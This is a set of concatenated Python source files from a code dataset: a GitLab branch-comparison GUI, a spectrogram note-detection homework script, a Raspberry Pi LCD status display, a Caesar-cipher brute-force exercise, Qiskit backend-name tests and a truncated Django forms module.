threading_list = []\n for i in folder:\n if i['type'] == \"tree\":\n self.insert_info(\"文件夹:\" + i['name'])\n deeper_file_name = filename + \"/\" + i['name'] + \"/Cfgs\"\n if not os.path.exists(filename + \"/\" + i['name']):\n os.mkdir(filename + \"/\" + i['name'])\n if not os.path.exists(deeper_file_name):\n os.mkdir(deeper_file_name)\n t = threading.Thread(target=self.download_single_file, args=(i['name'], deeper_file_name))\n t.start()\n threading_list.append(t)\n for i in threading_list:\n i.join()\n self.insert_info(\"下载完毕 and cost time: {}\".format(time.time() - start_time), 1, 1)\n self.insert_info(\"文件夹所在位置 : {}\".format(filename), 1, 1)\n\n\n\n\n\n def download_single_file(self, file_path, deeper_file_name):\n deeper_files = self._project.repository_tree(self.specify_folder + \"/\" + file_path + \"/Cfgs\", all=True, ref=self.target_branche)\n # print(\"deeper_files:\", len(deeper_files))\n # index = 1\n for j in deeper_files:\n if not j['name'].endswith(\".meta\"):\n # index += 1\n # self.insert_info(\"第三层:\" + j['name'] + \", style: \" + j['type'])\n try:\n with open(deeper_file_name + \"/\" + j['name'], \"w\", encoding='utf-8') as f:\n _name = self.specify_folder + \"/\" + file_path + \"/Cfgs/\" + j['name']\n # print(file_path + \": \" + _name)\n # print(deeper_file_name + \"/\" + j['name'])\n # print(\"_name:\", _name)\n # continue\n f.write(self._project.files.get(_name, ref=self.target_branche).decode().decode())\n except Exception:\n print(\"exception file name: \", deeper_file_name + \"/\" + j['name'])\n break\n # print(\"index: \", index)\n # 保存日志到当前目录(.txt)\n def save_log(self, e):\n array = e.get(1.0, tk.END)\n if len(array) == 1:\n messagebox.showerror('错误', '没有日志可保存!')\n return\n now_time = get_now_time()\n if not os.path.exists('配置文件夹'):\n os.mkdir('配置文件夹')\n if not os.path.exists('配置文件夹\\日志'):\n os.mkdir('配置文件夹\\日志')\n filename = now_time.replace(':', '_')\n filename = ''.join([os.getcwd(), '\\配置文件夹\\日志\\分支提交差异日志_', filename, '.txt'])\n with open(filename, 'w') as f:\n f.write(array)\n self.insert_info('日志保存成功, 路径为<%s>\\n' % filename, 1, 1)\n messagebox.showinfo('', '保存成功')\n\n def button_download(self):\n if len(self.target_info) <= 1:\n self.insert_info(\"未发现差异信息\", 1, 1)\n return\n for _ in self.target_info[1:]:\n if _[-2] == 2:\n self.insert_info(str(_))\n\n 
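# the two helpers below parse the free-text entry widgets: change_filter expects a \", \"-separated list (e.g. \"Merge branch, Lua\") and change_date expects \"xx-xx-xx\"\n    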
def change_filter(self, ent):\n _value = ent.get()\n if len(_value.split(', ')) < 1:\n self.insert_info(\"输入过滤条件异常: %s !请检查是否满足格式xx, xx, xx\" % _value, 1, 2)\n return\n self.filters = _value.split(', ')\n self.insert_info(\"修改过滤条件成功: %s\" % _value, 1, 1)\n\n def change_date(self, ent):\n _value = ent.get()\n if len(_value.split('-')) == 3:\n self.target_branche_create_time = _value\n self.insert_info(\"分支创建时间修改成功: %s\" % _value, 1, 1)\n else:\n self.insert_info(\"修改失败! 请检查时间格式是否满xx-xx-xx :%s\" % _value, 1, 2)\n\n def choose_project(self, com1, com2, com3):\n project_name = com1.get()\n try:\n self._client = gitlab.Gitlab(PROJECT_INFO[project_name][0], private_token=PROJECT_INFO[project_name][1])\n self._client.auth()\n except Exception:\n self.insert_info(str(sys.exc_info()), 1, 2)\n self.insert_info(\"登录成功\", 1, 1)\n # projects = client.projects.list() # 获取所有项目信息\n self._project = self._client.projects.get(id=PROJECT_INFO[project_name][2]) # 获取对应项目\n # logs = project.commits.list(ref_name=\"master\", since=\"2020-03-05T11:01:23.000+07:00\") # 获取对应分支 某事件后的提交信息\n branches = self._project.branches.list(all=True, order_by=\"created_at\")\n # files = self._project.files.get\n self._branches = {}\n for i in branches:\n self._branches.update({i.name: getattr(i, \"commit\").get('created_at')})\n com2['values'] = list(self._branches.keys())\n # com3['values'] = list(self._branches.keys())\n # for _ in branches:\n # print(_)\n self.insert_info(\"获取《%s》项目分支信息成功!\" % project_name, 1, 1)\n\n def choose_branch(self, com2):\n target = com2.get()\n if target not in self._branches.keys():\n self.insert_info(\"《%s》分支不存在!\" % target, 1, 2)\n return\n self.target_branche = target\n self.insert_info(\"选中《%s》分支成功!\" % target, 1, 1)\n\n def choose_branch_3(self, com3):\n target = com3.get()\n if target not in self._branches.keys():\n self.insert_info(\"《%s》分支不存在!\" % target, 1, 2)\n return\n self._master_name = target\n self.insert_info(\"选中《%s》分支成功!\" % target, 1, 1)\n\n def button_check_git(self):\n print('选中分支名为: %s, time: %s ' % (self.target_branche, self._branches[self.target_branche]))\n # create_time = self._client.commits.list(ref_name=self.target_branche)\n # brache = self._project.branches.get(self.target_branche)\n # print('目标分支信息: %s' % brache)\n # 1.5.0分支创建时间:2020-04-23 16:37:07 +0800\n # TODO 如果获取分支创建时间\n # self.target_branche_create_time = \"2020-03-13 16:37:07 +0800\"\n logs_target = self._project.commits.list(ref_name=self.target_branche, all=True,\n since=self.target_branche_create_time)\n logs_master = self._project.commits.list(ref_name=self._master_name, all=True,\n since=self.target_branche_create_time)\n self.target_info = [{\"描述\": 480, \"日期\": 120, \"作者\": 40, \"提交id\": 160}]\n master_info = [self.target_info[0]]\n # index = 3(过滤) or 2(未匹配到) or 1(匹配成功) 0(无色)\n for info in logs_target:\n index = 0\n if self.filter_title(self.filters, info.title):\n index = 3\n self.target_info.append([info.title, info.created_at[:-10], info.committer_name, info.id, index, 0])\n for info in logs_master:\n index = 0\n if self.filter_title(self.filters, info.title):\n index = 3\n master_info.append([info.title, info.created_at[:-10], info.committer_name, info.id, index, 0])\n del logs_target\n del logs_master\n index_tar = 0\n for info in self.target_info[1:]:\n index_tar += 1\n # 不匹配过滤单位\n if info[-2] == 3:\n continue\n exist = False\n index_mat = 0\n for _info in master_info[1:]:\n index_mat += 1\n # 不匹配过滤单位\n if info[-2] == 3:\n continue\n if info[0] == _info[0]:\n info[-2] = 1\n info[-1] = index_mat\n 
_info[-2] = 1\n _info[-1] = index_tar\n print(\"找到相同项: %s\" % info[0])\n exist = True\n continue\n if not exist:\n info[-2] = 2\n for _ in self.target_info[1:]:\n if _[-2] == 2:\n print(str(_))\n GitTopUiInfo(\"master与分支提交检查\", master_info, self.target_info)\n\n def insert_info(self, information, use_time=0, tag=0):\n if use_time:\n time = get_now_time() + ': '\n else:\n time = ''\n if tag == 0:\n this_tag = ''\n elif tag == 1:\n this_tag = 'tag1'\n elif tag == 2:\n this_tag = 'tag2'\n self.tex.insert(tk.END, time + information + '\\n', this_tag)\n\n def filter_title(self, rule, target):\n if not isinstance(rule, list):\n rule = [rule]\n for _ in rule:\n if _ in target:\n return True\n return False\n","sub_path":"page/sixth.py","file_name":"sixth.py","file_ext":"py","file_size_in_byte":14343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"287153379","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io as sp\nfrom numpy.fft import fft, fftshift, ifft, ifftshift\n\n## Helper Functions\n\n# Converts a given frequency into the corresponding note name\ndef freq2note(freq):\n if freq < 25 or freq > 4190:\n return \"\"\n key_num = int(round(12 * np.log2(freq / 440) + 49))\n octave = int(np.floor((key_num + 8) / 12))\n note_index = key_num % 12 - 1\n if note_index == -1:\n note_index = 11\n notes = ['A', 'A#', 'B', 'C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#']\n return notes[note_index] + str(octave)\n\n# Converts a given note name into the frequency\ndef note2freq(note):\n if len(note) == 3:\n note_name = note[0:2]\n octave = int(note[2])\n elif len(note) == 2:\n note_name = note[0]\n octave = int(note[1])\n else:\n return 0\n notes = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']\n\n note_index = notes.index(note_name)\n key_num = note_index + 4 + (12 * (octave - 1))\n return np.power(2, (key_num - 49) / 12) * 440\n\n# Convert a frequency into the corresponding index in order to set limits\n# on the y-axis of the spectrogram\ndef getFreqIndex(ks, freq):\n index = ks.searchsorted(freq)\n index = np.clip(index, 1, len(ks) - 1)\n left = ks[index - 1]\n right = ks[index]\n index -= freq - left < right - freq\n return index\n\n# Given a spectrogram and threshold value, returns the list of note names that have a amplitude\n# larger than the threshold, inserting empty strings where no note is found\ndef getNotes(spectrogram, ks, threshold):\n max_freq_ind = np.argmax(spectrogram, axis=0)\n max_freq = np.max(spectrogram, axis=0)\n max_freq_ind[max_freq < threshold] = 0\n note_frequencies = ks[max_freq_ind]\n notes = np.array([freq2note(frequency) for frequency in note_frequencies])\n return notes, note_frequencies\n\n# Discards parts of the spectrogram outside of the given min and max frequencies\ndef clipSpectrogram(spectrogram, ks, min_freq, max_freq):\n min_freq_ind = getFreqIndex(ks, min_freq)\n max_freq_ind = getFreqIndex(ks, max_freq)\n\n spectrogram = spectrogram[min_freq_ind:max_freq_ind, :]\n ks = ks[min_freq_ind:max_freq_ind]\n\n return spectrogram, ks\n\n# Takes the song matrices imported from matlab and returns the song vector and sample rate.\ndef getSongMatData(song):\n y = song['y'].flatten()\n Fs = song['Fs'].flatten()[0]\n return y, Fs\n\n\n# Takes song vector and sample rate and returns the total number of samples, \n# length in seconds, time vector, and shifted frequency vector\ndef getSongData(y, Fs):\n n = len(y)\n song_length = n / Fs\n t = np.arange(0, n) / Fs\n k = 
np.append(np.arange(0, n/2), np.arange(-n/2, 0)) / song_length\n    ks = fftshift(k)\n    return n, song_length, t, ks\n\n# Creates a spectrogram by first splitting it into parts and then stitching those partial\n# spectrograms together\ndef createSpectrogramSplit(y, Fs, num_parts, num_windows, filter_width, log_transform, debug_plot = False):\n    y_parts = np.split(y, num_parts)\n    spectrogram = np.zeros((len(y_parts[0]), 0))\n    all_taus = np.array([])\n    for i, yi in enumerate(y_parts):\n        print(\"Part: \" + str(i + 1) + \" / \" + str(num_parts))\n\n        _, song_length, _, _ = getSongData(yi, Fs)\n\n        spectrogram_partial, taus, ks = createSpectrogram(yi, Fs, num_windows, filter_width, log_transform, debug_plot)\n        all_taus = np.hstack((all_taus, taus + song_length * i))\n\n        spectrogram = np.hstack((spectrogram, spectrogram_partial))\n\n    return spectrogram, all_taus, ks\n\n# Creates a spectrogram of a given song vector\ndef createSpectrogram(y, Fs, num_windows, filter_width, log_transform, debug_plot = False):\n    n, _, t, ks = getSongData(y, Fs)\n\n    taus = np.linspace(0, t[-1], num_windows)\n    spectrogram = np.zeros((n, num_windows))\n\n    for i, tau in enumerate(taus):\n        print(\"Progress: \" + str(i + 1) + \" / \" + str(num_windows))\n        gauss = np.exp(-filter_width * (t - tau)**2)\n        window = y * gauss\n        y_transform = fftshift(fft(window))\n\n        if log_transform:\n            spectrogram[:, i] = np.log(np.abs(y_transform) + 1)\n        else:\n            spectrogram[:, i] = np.abs(y_transform)\n\n        if debug_plot and i == int(num_windows / 4):\n            plt.plot(t, gauss)\n            plt.show()\n\n            plt.plot(t, y * gauss)\n            plt.show()\n\n            plt.plot(ks, np.abs(y_transform))  # the FFT output is complex; plot its magnitude\n            plt.show()\n\n    return spectrogram, taus, ks\n\n# Plots a spectrogram\ndef plotSpectrogram(spectrogram, taus, ks, title=\"\"):\n    plt.pcolormesh(taus, ks, spectrogram, shading='gouraud', cmap='hot')\n    plt.colorbar()\n    plt.title(title, size=28)\n    plt.xlabel(\"Time\", size=24)\n    plt.ylabel(\"Frequency\", size=24)\n\n# Adds text annotations of note names to a spectrogram\ndef labelNotes(notes, taus, note_frequencies):\n    prev_note = \"\"\n    for i, note in enumerate(notes):\n        if note != prev_note:\n            note_txt = note\n            if len(note) == 3:\n                note_txt = \"$\\mathregular{\" + note[0] + \"^\\\\\" + note[1] + \"_\" + note[2] + \"}$\"\n            elif len(note) == 2:\n                note_txt = \"$\\mathregular{\" + note[0] + \"_\" + note[1] + \"}$\"\n            plt.annotate(note_txt, (taus[i], note_frequencies[i]), color='b', weight='bold', fontsize=22)\n            prev_note = note\n\n# Plots a spectrogram with note names added\ndef plotSpectrogramWithNotes(spectrogram, taus, ks, threshold, title=\"\"):\n    plotSpectrogram(spectrogram, taus, ks, title)\n    notes, note_frequencies = getNotes(spectrogram, ks, threshold)\n    labelNotes(notes, taus, note_frequencies)\n    plt.show()\n\n# Load data from MATLAB matrices\ngnr = sp.loadmat('GNR.mat')\nfloyd = sp.loadmat('Floyd.mat')\n\n## Part 1\n# Create Spectrogram and Label Notes for GNR\ny, Fs = getSongMatData(gnr)\n\nspectrogram, taus, ks = createSpectrogram(y, Fs, num_windows=100, filter_width=500, log_transform=True)\n\n# Normalize spectrogram\nspectrogram = spectrogram / np.amax(spectrogram)\n\n# Throw away values outside normal music range for performance reasons\nspectrogram, ks = clipSpectrogram(spectrogram, ks, min_freq=0, max_freq=1000)\n\nplotSpectrogramWithNotes(spectrogram, taus, ks, threshold=.3, title=\"Spectrogram of Guns N' Roses Sample\")\n\n\n# Create Spectrogram and Label Notes for Floyd\ny, Fs = getSongMatData(floyd)\ny = y[0:-1]\n\nspectrogram, taus, ks = createSpectrogramSplit(y, Fs, num_parts=10, 
num_windows=25, filter_width = 50, log_transform=True)\n\n# Normalize spectrogram, crop to desired area\nspectrogram = spectrogram / np.amax(spectrogram)\nspectrogram, ks = clipSpectrogram(spectrogram, ks, min_freq=0, max_freq=1000)\n\nplotSpectrogramWithNotes(spectrogram, taus, ks, threshold=.5, title=\"Spectrogram of Pink Floyd Sample\")\n\n\n## Part 2\ny, Fs = getSongMatData(floyd)\ny = y[0:-1]\n\nn, _, _, ks = getSongData(y, Fs)\n\n# Take Fourier Transform and apply a band pass filter to isolate the bass\ny_transform = fftshift(fft(y))\nlf = 60\nhf = 150\nband_filter = np.zeros(n)\nband_filter[getFreqIndex(ks, lf):getFreqIndex(ks, hf)] = 1\n\ny_transform_filtered = y_transform * band_filter\ny_filtered = ifft(ifftshift(y_transform_filtered))\n\n# Now create the spectrogram as above, except using the filtered version\nspectrogram_bass, taus, ks = createSpectrogramSplit(y_filtered, Fs, num_parts=10, num_windows=25, filter_width=5, log_transform=True)\n\n# Normalize spectrogram, crop to desired area\nspectrogram_bass = spectrogram_bass / np.amax(spectrogram_bass)\nspectrogram_bass, ks = clipSpectrogram(spectrogram_bass, ks, min_freq=50, max_freq=160)\n\nplotSpectrogramWithNotes(spectrogram_bass, taus, ks, threshold=.5, title=\"Spectrogram of Isolated Bass Guitar from Pink Floyd Sample\")\n\n## Part 3\ny, Fs = getSongMatData(floyd)\ny = y[0:-1]\nn, _, _, ks = getSongData(y, Fs)\n\ny_transform = fftshift(fft(y))\nlf = 150\nhf = 20000\nband_filter = np.zeros(n)\nband_filter[getFreqIndex(ks, lf):getFreqIndex(ks, hf)] = 1\n\ny_transform_filtered = y_transform * band_filter\ny_filtered = ifft(ifftshift(y_transform_filtered))\n\n# Now create the spectrogram as above, except using the filtered version\nspectrogram, taus, ks = createSpectrogramSplit(y_filtered, Fs, num_parts=10, num_windows=25, filter_width=5, log_transform=True)\n\n# Normalize spectrogram, crop to desired area\nspectrogram = spectrogram / np.amax(spectrogram)\nspectrogram, ks = clipSpectrogram(spectrogram, ks, min_freq=0, max_freq=1200)\n\n# Get the bass note names\nbass_notes, _ = getNotes(spectrogram_bass, ks, threshold=.5)\n\novertone_filters = np.zeros(spectrogram.shape)\n\nfor i, note in enumerate(bass_notes):\n # Find the frequency of each note to construct the overtones from\n freq = note2freq(note)\n\n num_overtones = 15\n gauss_filters = np.zeros((spectrogram.shape[0], num_overtones))\n # Construct a Gaussian filter for each overtone\n for overtone_num in range(num_overtones):\n filter_width = .005\n center_frequency = freq * (overtone_num + 1)\n gauss_filters[:, overtone_num] = np.exp(-filter_width* (ks - center_frequency)**2) / (overtone_num + 1)\n # Add up all the Gaussian filters and invert it\n combined_filter = 1 - np.sum(gauss_filters, axis=1)\n\n # Add the filter for each time point\n overtone_filters[:, i] = combined_filter\n\n# Apply the filter to the spectrogram\nspectrogram_no_overtones = spectrogram * overtone_filters\n\nplotSpectrogram(overtone_filters, taus, ks, title=\"Spectrogram of Filter to Remove Overtones\")\nplt.show()\n\nplotSpectrogramWithNotes(spectrogram_no_overtones, taus, ks, threshold=.25, title=\"Spectrogram of Pink Floyd Sample w/o Bass Guitar, Filtered to Remove Overtones\")\n\nplotSpectrogramWithNotes(spectrogram, taus, ks, threshold=.5, title=\"Spectrogram of Pink Floyd Sample w/o Bass Guitar, No Filter Applied\")","sub_path":"HW 
2/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":9768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"146005378","text":"#!/usr/bin/python\n# Example using a character LCD connected to a Raspberry Pi or BeagleBone Black.\nfrom subprocess import *\nfrom time import sleep, strftime\nfrom datetime import datetime\nimport math\n\nimport Adafruit_CharLCD as LCD\nimport Adafruit_DHT\n\n# Commands\ncmd = \"ip addr show eth0 | grep inet | awk '{print $2}' | cut -d/ -f1\"\n\ndef run_cmd(cmd):\n p = Popen(cmd, shell=True, stdout=PIPE)\n output = p.communicate()[0]\n return output\n\ndef roundy(val):\n return math.ceil(val*100)/100\n\n# Raspberry Pi pin configuration:\nlcd_rs = 25 # Note this might need to be changed to 21 for older revision Pi's.\nlcd_en = 24\nlcd_d4 = 23\nlcd_d5 = 17\nlcd_d6 = 21\nlcd_d7 = 22\nlcd_backlight = 4\n\n# Define LCD column and row size for 16x2 LCD.\nlcd_columns = 16\nlcd_rows = 2\n\n# Initialize the LCD using the pins above.\nlcd = LCD.Adafruit_CharLCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7,\n lcd_columns, lcd_rows, lcd_backlight)\n\nwhile True:\n lcd.clear()\n ipaddr = run_cmd(cmd)\n date = datetime.now().strftime('%b %d %H:%M:%S')\n lcd.message(date)\n lcd.message('\\nIP %s' % ( ipaddr ) )\n sleep(5)\n\n lcd.clear()\n humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.AM2302, 14)\n \n lcd.message('Temp: %sC' % str(roundy(temperature)))\n lcd.message('\\nHumidity: %s' % str(roundy(humidity)))\n sleep(5)\n\n \n","sub_path":"projects/sensors/lcd_ip.py","file_name":"lcd_ip.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"415677107","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\ninstala_requisitos=[ # Funciona só no Linux a princípio. 
Rodar no Windows: pip3 install pyfiglet colorama\n    'pyfiglet',\n    'colorama'\n]\n\nimport os\nfrom pyfiglet import Figlet\nfrom colorama import Fore, Back, Style\nfrom unicodedata import normalize\n\n# FUNCTIONS\ndef dasegArt():\n    custom_fig = Figlet(font='digital')\n    print(Fore.RED + custom_fig.renderText('....CaesarBruteForce_v2.3....'))\n    custom_fig = Figlet(font='cosmic')\n    print(Style.DIM + custom_fig.renderText('        DASEG'))\n    custom_fig = Figlet(font='digital')\n    print(Style.NORMAL + custom_fig.renderText('..Developed by PsyDeciphers..'))\n\ndef encryptCaesar(string, shift): # Performs the Caesar cipher\n# https://www.thecrazyprogrammer.com/2018/05/caesar-cipher-in-python.html\n    cipher = ''\n    for char in string: \n        if char == ' ':\n            cipher = cipher + char\n        elif char.isupper():\n            cipher = cipher + chr((ord(char) + shift - 65) % 26 + 65)\n        else:\n            cipher = cipher + chr((ord(char) + shift - 97) % 26 + 97)\n    return cipher\n\ndef bfCaesar(encryptedWord): # Brute-forces an encrypted word against a dictionary\n    letras = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n    with open('resultados_bfCaesar.txt', 'w') as resultados:\n        for chave in range(len(letras)):\n            resultado = ''\n            for letra in encryptedWord.upper(): \n                if letra in letras:\n                    num = letras.find(letra)\n                    num = num - chave\n                    if num < 0:\n                        num = num + len(letras)\n                    resultado = resultado + letras[num]\n                else:\n                    resultado = resultado + letra\n            resultados.write(\"%s\\n\" % resultado.lower())\n            print ('Chave #%s: %s' % (chave, resultado))\n        resultados.close()\n    with open('resultados_bfCaesar.txt', encoding=\"ISO-8859-1\") as file1:\n        with open('dictionary_brazilian.dic', encoding=\"ISO-8859-1\") as file2:\n            same = set(file1).intersection(file2)\n\n    same.discard('\\n')\n    same2 = list(same)\n    print (Fore.GREEN)\n    print ('Palavra encontrada---> %s' % (same2[0].upper()))\n    print (Fore.RED)\n\n    with open('palavraEncontrada.txt', 'w') as file_out:\n        for line in same:\n            file_out.write(line)\n    return 0\n\ndef cls(): # Clears the screen\n    os.system('cls') or None # Windows\n    os.system('clear') or None # Linux\n\ndef removeAcentos(texto):\n    return normalize('NFKD', texto).encode('ASCII', 'ignore').decode('ASCII')\n\n# MAIN FLOW\nloop = True\nwhile loop:\n    dasegArt()\n    escolha = int(input('Escolha uma opção:\\n1- Criptografar uma palavra com Cesar \\n2- Força bruta em arquivo de texto \\n3- Limpar tela \\n4- Sair\\n\\nSua escolha? ' ))\n    cls() \n    if escolha==1: \n        dasegArt()\n        print ('Opção escolhida: Criptografar uma palavra com Cesar\\n')\n        textoClaro = input('Insira uma palavra para criptografar: ')\n        textoClaro = textoClaro.replace(\" \",\"\")\n        s = int(input('\\nEscolha a chave entre 1~25: '))\n        encrypted = encryptCaesar(removeAcentos(textoClaro), s)\n        print ('\\nPalavra criptografada: %s' % (encrypted));\n        gravar = input('\\nDeseja salvar no arquivo palavraCifradaCaesar.txt (S/N)? ')\n        if gravar.upper() == 'S':\n            saida = open('palavraCifradaCaesar.txt', 'w')\n            saida.write(encrypted)\n            saida.close()\n\n    elif escolha==2:\n        dasegArt()\n        print ('Opção escolhida: Força bruta em arquivo de texto \\n')\n        arquivoEntrada = open('palavraCifradaCaesar.txt', 'r')\n        encryptedWord = arquivoEntrada.read()\n        arquivoEntrada.close()\n        bfCaesar(encryptedWord)\n\n    elif escolha==3:\n        cls()\n\n    elif escolha==4:\n        print ('Fechando...')\n        loop=False\n\n    else: # any entry outside the 1~4 menu range falls through to this error message\n        print('Opção errada! 
Tente novamente.\\n')\n","sub_path":"cripto_CaesarBruteForce/Caesar_BruteForce_v2.3.py","file_name":"Caesar_BruteForce_v2.3.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"490256032","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2018, IBM.\n#\n# This source code is licensed under the Apache License, Version 2.0 found in\n# the LICENSE.txt file in the root directory of this source tree.\n\n\n\"\"\"Test backend name resolution for functionality, via groups, deprecations and\naliases.\"\"\"\n\nfrom qiskit import IBMQ, BasicAer, LegacySimulators\nfrom qiskit.providers.legacysimulators import QasmSimulator\nfrom qiskit.providers.exceptions import QiskitBackendNotFoundError\nfrom .common import (QiskitTestCase,\n is_cpp_simulator_available,\n requires_cpp_simulator,\n requires_qe_access)\n\n\nclass TestBackendNameResolution(QiskitTestCase):\n \"\"\"\n Test backend name resolution algorithms.\n \"\"\"\n\n def test_deprecated(self):\n \"\"\"Test that deprecated names map the same backends as the new names.\n \"\"\"\n for provider in (BasicAer, LegacySimulators):\n deprecated_names = provider._deprecated_backend_names()\n\n for oldname, newname in deprecated_names.items():\n if newname in ('qasm_simulator',\n 'statevector_simulator') and not is_cpp_simulator_available():\n continue\n\n with self.subTest(provider=provider, oldname=oldname, newname=newname):\n try:\n resolved_newname = _get_first_available_backend(provider, newname)\n real_backend = provider.get_backend(resolved_newname)\n except QiskitBackendNotFoundError:\n # The real name of the backend might not exist\n pass\n else:\n self.assertEqual(provider.backends(oldname)[0], real_backend)\n\n @requires_qe_access\n def test_aliases(self, qe_token, qe_url):\n \"\"\"Test that display names of devices map the same backends as the\n regular names.\"\"\"\n IBMQ.enable_account(qe_token, qe_url)\n aliased_names = IBMQ._aliased_backend_names()\n\n for display_name, backend_name in aliased_names.items():\n with self.subTest(display_name=display_name,\n backend_name=backend_name):\n try:\n backend_by_name = IBMQ.get_backend(backend_name)\n except QiskitBackendNotFoundError:\n # The real name of the backend might not exist\n pass\n else:\n backend_by_display_name = IBMQ.get_backend(display_name)\n self.assertEqual(backend_by_name, backend_by_display_name)\n self.assertEqual(backend_by_display_name.name(), backend_name)\n\n def test_aliases_fail(self):\n \"\"\"Test a failing backend lookup.\"\"\"\n self.assertRaises(QiskitBackendNotFoundError, BasicAer.get_backend, 'bad_name')\n\n def test_aliases_return_empty_list(self):\n \"\"\"Test backends() return an empty list if name is unknown.\"\"\"\n self.assertEqual(BasicAer.backends(\"bad_name\"), [])\n\n def test_deprecated_cpp_simulator_return_no_backend(self):\n \"\"\"Test backends(\"local_qasm_simulator_cpp\") does not return C++\n simulator if it is not installed\"\"\"\n name = \"local_qasm_simulator_cpp\"\n backends = LegacySimulators.backends(name)\n if is_cpp_simulator_available():\n self.assertEqual(len(backends), 1)\n self.assertIsInstance(backends[0] if backends else None, QasmSimulator)\n else:\n self.assertEqual(len(backends), 0)\n\n\nclass TestSimulatorBackendNames(QiskitTestCase):\n \"\"\"\n Test deprecated names from providers.\n \"\"\"\n @requires_cpp_simulator\n def test_legacy_deprecated(self):\n \"\"\"test deprecated legacy simulators backends are resolved correctly\"\"\"\n old_name = 
'local_qiskit_simulator'\n        new_backend = LegacySimulators.get_backend(old_name)\n        self.assertIsInstance(new_backend, QasmSimulator)\n\n\ndef _get_first_available_backend(provider, backend_names):\n    \"\"\"Gets the first available backend.\"\"\"\n    if isinstance(backend_names, str):\n        backend_names = [backend_names]\n\n    for backend_name in backend_names:\n        try:\n            return provider.get_backend(backend_name).name()\n        except QiskitBackendNotFoundError:\n            pass\n\n    return None\n","sub_path":"test/python/test_backend_name_resolution.py","file_name":"test_backend_name_resolution.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"95377354","text":"#!/usr/bin/env python3\nimport picamera\nimport sys\nimport os\nimport warnings\nimport time\nfrom timeit import default_timer as timer\nfrom datetime import datetime\nimport traceback\n\nsys.path.append(os.path.abspath(os.path.join(\n    os.path.dirname(__file__), \"../models\")))\n\nfrom frame_data import FrameData\nfrom row_data import RowData\n\nsys.path.append(os.path.abspath(os.path.join(\n    os.path.dirname(__file__), \"../detection\")))\n\nfrom line import Line\n\nclass CaptureThreshold():\n    __frame_processor_queue = None\n    __camera = None\n    __line_processor = None\n    __width = 32\n    __height = 32\n    __framerate = 30\n\n    def __init__(self, queue, width, height, framerate, set_speed):\n        self.__framerate = framerate\n        self.__frame_processor_queue = queue\n        self.__width = width\n        self.__height = height\n        self.__line_processor = Line(queue, set_speed)\n        self.__camera = picamera.PiCamera(resolution='{:d}x{:d}'.format(width, height), framerate=framerate)\n        self.__camera.start_preview()\n        # Wait for 3s to settle\n        time.sleep(3)\n\n    def write_pgm(self, filename, w, h, data):\n        with open(filename, 'wb') as f:\n            f.write(\"P5\\n{:d} {:d}\\n255\\n\".format(w, h).encode('utf8'))\n            f.write(data)\n\n    \n    def start_capture(self, threshold, stretch, save):\n        data = bytearray(b'\\0' * (self.__width * (self.__height * 2)))\n        start = timer()\n        prev = start\n        i = 0\n        # total = 0\n        folderName = \"captures/\" + datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n        if not os.path.exists(folderName):\n            os.makedirs(folderName)\n\n        try:\n            for foo in self.__camera.capture_continuous(data, 'yuv', use_video_port=True):\n                i = i + 1\n                if save:\n                    # Save original\n                    self.write_pgm(\"{:s}/grayscale_{:d}.pgm\".format(folderName, i), self.__width, self.__height, data)\n\n                self.__line_processor.process_bytearray(data, self.__width, self.__height, threshold, stretch, i)\n\n                if save:\n                    # Save result\n                    self.write_pgm(\"{:s}/processed_{:d}.pgm\".format(folderName, i), self.__width, self.__height, data)\n\n                now = timer()\n                t = now - prev\n                #print(\"Frame time: {}, processing took: {}\".format(t, proc_time))\n                prev = now\n\n                print(\"{:d} frames in {}, {} fps\".format(i, now - start, i / (now - start)))\n        except Exception as e:\n            print(e)\n            traceback.print_exc()\n\n\n\n    def stop_capture(self):\n        if self.__camera:\n            self.__camera.stop_preview()\n        # exit(0)\n\n\nif __name__ == '__main__':\n    from queue import Queue\n    # smoke-test values: the dummy frame queue, framerate, speed and threshold below are assumptions, not part of the original call\n    lineDetector = CaptureThreshold(Queue(), 32, 32, 30, 0)\n    lineDetector.start_capture(threshold=128, stretch=True, save=True)\n    time.sleep(3)\n    lineDetector.stop_capture()","sub_path":"dev/pi/libs/diycv/camera/capture_threshold.py","file_name":"capture_threshold.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"146341652","text":"from django import forms\n\nfrom 
.models import Component, Structural\n\nclass ComponentCreationForm(forms.ModelForm):\n    class Meta:\n        model = Component\n        fields = [\n            'name',\n            'file',\n        ]\n\nclass StructuralSelectionForm(forms.ModelForm):\n    # a multiple-choice model field is needed for CheckboxSelectMultiple to offer several components\n    component_list = forms.ModelMultipleChoiceField(\n        queryset=Component.objects.all(),\n        widget=forms.CheckboxSelectMultiple,\n    )\n    conferma = forms.ChoiceField(\n        required=False,\n        choices=[(False, 'No'), (True, 'Si')],\n    )\n\n    class Meta:\n        model = Structural\n        fields = (\n            'name',\n            'component_list',\n        )\n\nclass StructuralMappingForm(forms.Form):\n    porte = forms.ChoiceField(\n        choices=[('port1', 'port1'), ('port2', 'port2'), ('port3', 'port3')],\n        required=True,\n        label='Mapping'\n    )\n\n    def __init__(self, *args, **kwargs):\n        # pop the custom port_list and identity kwargs before calling the parent constructor\n        port_list = kwargs.pop('port_list')\n        identity = kwargs.pop('identity')\n        super(StructuralMappingForm, self).__init__(*args, **kwargs)\n        # 